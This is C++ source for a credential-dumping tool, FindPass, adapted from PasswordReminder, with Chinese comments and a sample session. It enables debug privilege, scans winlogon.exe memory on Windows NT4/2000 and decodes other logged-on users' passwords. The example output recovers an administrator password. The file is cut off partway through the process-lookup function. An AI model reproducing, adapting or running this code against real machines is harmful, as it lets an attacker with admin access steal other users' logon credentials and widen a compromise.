// Find Password from winlogon in win2000 / winnt4 + < sp6
//
// PasswordReminder.cpp --> FindPass.cpp
// 1. http://www.smidgeonsoft.com/
// 2. shotgun add comment, bingle change a little to find other user in winlogon
// This code is licensed under the terms of the GPL (gnu public license). 
//
// Usage: FindPass DomainName UserName PID-of-WinLogon
//
// you can get the three params from pulist output in target system.
//

/*
因為登陸的域名和用戶名是明文存儲在winlogon進程里的，而PasswordReminder是限定了查找本進程用戶的密碼
<167-174： GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
GetEnvironmentVariableW (L"USERDOMAIN", UserDomain, 0x400); 
>，然后到winlogon進程的空間中查找UserDomain和UserName < 590:// 在WinLogon的內存空間中尋找UserName和DomainName的字符串 
if ((wcscmp ((wchar_t *) RealStartingAddressP, UserName) == 0) 
&& 
(wcscmp ((wchar_t *) ((DWORD) RealStartingAddressP + USER_DOMAIN_OFFSET_WIN2K), UserDomain) == 0)) 
> ，找到后就查后邊的加密口令。 

其實只要你自己指定用戶名和winlogon進程去查找就行了，只要你是管理員，任何本機用msgina.dll圖形登陸的用戶口令都可以找到。 

1. pulist，找到系統里登陸的域名和用戶名，及winlogon進程id 
2. 然后給每個winlogon進程id查找指定的用戶就行了。

example: 

C:\Documents and Settings\bingle>pulist 
Process PID User 
Idle 0 
System 8 
smss.exe 164 NT AUTHORITY\SYSTEM 
csrss.exe 192 NT AUTHORITY\SYSTEM 
winlogon.exe 188 NT AUTHORITY\SYSTEM 
wins.exe 1212 NT AUTHORITY\SYSTEM 
Explorer.exe 388 TEST-2KSERVER\Administrator 
internat.exe 1828 TEST-2KSERVER\Administrator 
conime.exe 1868 TEST-2KSERVER\Administrator 
msiexec.exe 1904 NT AUTHORITY\SYSTEM 
tlntsvr.exe 1048 NT AUTHORITY\SYSTEM 
taskmgr.exe 1752 TEST-2KSERVER\Administrator 
csrss.exe 2056 NT AUTHORITY\SYSTEM 
winlogon.exe 2416 NT AUTHORITY\SYSTEM 
rdpclip.exe 2448 TEST-2KSERVER\clovea 
Explorer.exe 2408 TEST-2KSERVER\clovea 
internat.exe 1480 TEST-2KSERVER\clovea 
cmd.exe 2508 TEST-2KSERVER\Administrator 
ntshell.exe 368 TEST-2KSERVER\Administrator 
ntshell.exe 1548 TEST-2KSERVER\Administrator 
ntshell.exe 1504 TEST-2KSERVER\Administrator 
csrss.exe 1088 NT AUTHORITY\SYSTEM 
winlogon.exe 1876 NT AUTHORITY\SYSTEM 
rdpclip.exe 1680 TEST-2KSERVER\bingle 
Explorer.exe 2244 TEST-2KSERVER\bingle 
conime.exe 2288 TEST-2KSERVER\bingle 
internat.exe 1592 TEST-2KSERVER\bingle 
cmd.exe 1692 TEST-2KSERVER\bingle 
mdm.exe 2476 TEST-2KSERVER\bingle 
taskmgr.exe 752 TEST-2KSERVER\bingle 
pulist.exe 2532 TEST-2KSERVER\bingle 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
administrator 188 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 188 (0x000000bc). 
To find TEST-2KSERVER\administrator password in process 188 ... 
The encoded password is found at 0x008e0800 and has a length of 10. 
The logon information is: TEST-2KSERVER/administrator/testserver. 
The hash byte is: 0x13. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 1876 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\clovea password in process 1876 ... 
PasswordReminder is unable to find the password in memory. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
bingle 1876 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 1876 (0x00000754). 
To find TEST-2KSERVER\bingle password in process 1876 ... 
The logon information is: TEST-2KSERVER/bingle. 
There is no password. 

C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER 
clovea 2416 

To Find Password in the Winlogon process 
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon 

The debug privilege has been added to PasswordReminder. 
The WinLogon process id is 2416 (0x00000970). 
To find TEST-2KSERVER\clovea password in process 2416 ... 
The logon information is: TEST-2KSERVER/clovea. 
There is no password. 

C:\Documents and Settings\bingle> 

*/

#include <stdafx.h>
#include <windows.h> 
#include <tchar.h> 
#include <stdio.h> 
#include <stdlib.h> 

typedef struct _UNICODE_STRING 
{ 
USHORT Length; 
USHORT MaximumLength; 
PWSTR Buffer; 
} UNICODE_STRING, *PUNICODE_STRING; 

// Undocumented typedef‘s 
typedef struct _QUERY_SYSTEM_INFORMATION 
{ 
DWORD GrantedAccess; 
DWORD PID; 
WORD HandleType; 
WORD HandleId; 
DWORD Handle; 
} QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION; 
typedef struct _PROCESS_INFO_HEADER 
{ 
DWORD Count; 
DWORD Unk04; 
DWORD Unk08; 
} PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER; 
typedef struct _PROCESS_INFO 
{ 
DWORD LoadAddress; 
DWORD Size; 
DWORD Unk08; 
DWORD Enumerator; 
DWORD Unk10; 
char Name [0x108]; 
} PROCESS_INFO, *PPROCESS_INFO; 
typedef struct _ENCODED_PASSWORD_INFO 
{ 
DWORD HashByte; 
DWORD Unk04; 
DWORD Unk08; 
DWORD Unk0C; 
FILETIME LoggedOn; 
DWORD Unk18; 
DWORD Unk1C; 
DWORD Unk20; 
DWORD Unk24; 
DWORD Unk28; 
UNICODE_STRING EncodedPassword; 
} ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO; 

typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD); 
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD); 
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID); 
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID); 
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING); 

// Private Prototypes 
BOOL IsWinNT (void); 
BOOL IsWin2K (void); 
BOOL AddDebugPrivilege (void); 
DWORD FindWinLogon (void); 
BOOL LocatePasswordPageWinNT (DWORD, PDWORD); 
BOOL LocatePasswordPageWin2K (DWORD, PDWORD); 
void DisplayPasswordWinNT (void); 
void DisplayPasswordWin2K (void); 

// Global Variables 
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation; 
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer; 
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation; 
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer; 
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString; 

DWORD PasswordLength = 0; 
PVOID RealPasswordP = NULL; 
PVOID PasswordP = NULL; 
DWORD HashByte = 0;
wchar_t UserName [0x400]; 
wchar_t UserDomain [0x400]; 

int __cdecl main( int argc, char* argv[] ) 
{ 
printf( "\n\t To Find Password in the Winlogon process\n" );
 printf( " Usage: %s DomainName UserName PID-of-WinLogon\n\n", argv[0] ); 

if ((!IsWinNT ()) 
&& 
(!IsWin2K ())) 
{ 
printf ("Windows NT or Windows 2000 are required.\n"); 
return (0); 
} 

// Add debug privilege to PasswordReminder - 
// this is needed for the search for Winlogon. 
// 增加PasswordReminder的權限 
// 使得PasswordReminder可以打開并調試Winlogon進程 
if (!AddDebugPrivilege ()) 
{ 
printf 
("Unable to add debug privilege.\n"); 
return (0); 
} 
printf ("The debug privilege has been added to PasswordReminder.\n"); 

// 獲得幾個未公開API的入口地址 
HINSTANCE hNtDll = 
LoadLibrary 
("NTDLL.DLL"); 
pfnNtQuerySystemInformation = 
(PFNNTQUERYSYSTEMINFORMATION) GetProcAddress 
(hNtDll, 
"NtQuerySystemInformation"); 
pfnRtlCreateQueryDebugBuffer = 
(PFNRTLCREATEQUERYDEBUGBUFFER) GetProcAddress 
(hNtDll, 
"RtlCreateQueryDebugBuffer"); 
pfnRtlQueryProcessDebugInformation = 
(PFNRTLQUERYPROCESSDEBUGINFORMATION) GetProcAddress 
(hNtDll, 
"RtlQueryProcessDebugInformation"); 
pfnRtlDestroyQueryDebugBuffer = 
(PFNRTLDESTROYQUERYDEBUGBUFFER) GetProcAddress 
(hNtDll, 
"RtlDestroyQueryDebugBuffer"); 
pfnRtlRunDecodeUnicodeString = 
(PFNTRTLRUNDECODEUNICODESTRING) GetProcAddress 
(hNtDll, 
"RtlRunDecodeUnicodeString"); 

// Locate WinLogon‘s PID - need debug privilege and admin rights. 
// 獲得Winlogon進程的PID 
// 這里作者使用了幾個Native API，其實使用PSAPI一樣可以 
DWORD WinLogonPID = 
argc > 3 ? atoi( argv[3] ) : FindWinLogon () ; 
if (WinLogonPID == 0) 
{ 
printf 
("PasswordReminder is unable to find WinLogon or you are using NWGINA.DLL.\n"); 
printf 
("PasswordReminder is unable to find the password in memory.\n"); 
FreeLibrary (hNtDll); 
return (0); 
} 

 printf("The WinLogon process id is %d (0x%8.8lx).\n", 
   WinLogonPID, WinLogonPID); 

// Set values to check memory block against. 
// 初始化幾個和用戶賬號相關的變量 
 memset(UserName, 0, sizeof (UserName)); 
 memset(UserDomain, 0, sizeof (UserDomain)); 
 if( argc > 2 )
 { 
  mbstowcs( UserName, argv[2], sizeof(UserName)/sizeof(*UserName) );
  mbstowcs( UserDomain, argv[1], sizeof(UserDomain)/sizeof(*UserDomain) );
 }else
 {
  GetEnvironmentVariableW(L"USERNAME", UserName, 0x400); 
  GetEnvironmentVariableW(L"USERDOMAIN", UserDomain, 0x400); 
 }
 printf( " To find %S\\%S password in process %d ...\n", UserDomain, UserName, WinLogonPID );

// Locate the block of memory containing 
// the password in WinLogon‘s memory space. 
// 在Winlogon進程中定位包含Password的內存塊 
BOOL FoundPasswordPage = FALSE; 
if (IsWin2K ()) 
FoundPasswordPage = 
LocatePasswordPageWin2K 
(WinLogonPID, 
&PasswordLength); 
else 
FoundPasswordPage = 
LocatePasswordPageWinNT 
(WinLogonPID, 
&PasswordLength); 

if (FoundPasswordPage) 
{ 
if (PasswordLength == 0) 
{ 
printf 
("The logon information is: %S/%S.\n", 
UserDomain, 
UserName); 
printf 
("There is no password.\n"); 
} 
else 
{ 
printf 
("The encoded password is found at 0x%8.8lx and has a length of %d.\n", 
RealPasswordP, 
PasswordLength); 
// Decode the password string. 
if (IsWin2K ()) 
DisplayPasswordWin2K (); 
else 
DisplayPasswordWinNT (); 
} 
} 
else 
printf 
("PasswordReminder is unable to find the password in memory.\n"); 

FreeLibrary 
(hNtDll); 
return (0); 
} // main 

// 
// IsWinNT函數用來判斷操作系統是否WINNT 
// 
BOOL 
IsWinNT 
(void) 
{ 
OSVERSIONINFO OSVersionInfo; 
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
if (GetVersionEx 
(&OSVersionInfo)) 
return (OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT); 
else 
return (FALSE); 
} // IsWinNT 


// 
// IsWin2K函數用來判斷操作系統是否Win2K 
// 
BOOL 
IsWin2K 
(void) 
{ 
OSVERSIONINFO OSVersionInfo; 
OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); 
if (GetVersionEx 
(&OSVersionInfo)) 
return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) 
&& 
(OSVersionInfo.dwMajorVersion == 5)); 
else 
return (FALSE); 
} // IsWin2K 


// 
// AddDebugPrivilege函數用來申請調試Winlogon進程的特權 
// 
BOOL 
AddDebugPrivilege 
(void) 
{ 
HANDLE Token; 
TOKEN_PRIVILEGES TokenPrivileges, PreviousState; 
DWORD ReturnLength = 0; 
if (OpenProcessToken 
(GetCurrentProcess (), 
TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, 
&Token)) 
if (LookupPrivilegeValue 
(NULL, 
"SeDebugPrivilege", 
&TokenPrivileges.Privileges[0].Luid)) 
{ 
TokenPrivileges.PrivilegeCount = 1; 
TokenPrivileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 
return 
(AdjustTokenPrivileges 
(Token, 
FALSE, 
&TokenPrivileges, 
sizeof (TOKEN_PRIVILEGES), 
&PreviousState, 
&ReturnLength)); 
} 
return (FALSE); 
} // AddDebugPrivilege 


// 
// Note that the following code eliminates the need 
// for PSAPI.DLL as part of the executable. 
// FindWinLogon函數用來尋找WinLogon進程 
// 由于作者使用的是Native API，因此不需要PSAPI的支持 
// 
DWORD 
FindWinLogon 
(void) 
{ 
#define INITIAL_ALLOCATION 0x100 
DWORD rc = 0; 
DWORD SizeNeeded = 0; 
PVOID InfoP = 
HeapAlloc 
(GetProcessHeap (), 
HEAP_ZERO_MEMORY, 
INITIAL_ALLOCATION); 
// Find how much memory is required. 
pfnNtQuerySystemInformation 
(0x10, 
InfoP, 
INITIAL_ALLOCATION, 
&SizeNeeded); 
HeapFree 
(GetProcessHeap (), 
0, 
InfoP); 
// Now, allocate the proper amount of memory. 
InfoP = 
HeapAlloc 
(GetProcessHeap (), 
HEAP_ZERO_MEMORY, 
SizeNeeded); 
DWORD SizeWritten = SizeNeeded; 
if (pfnNtQuerySystemInformation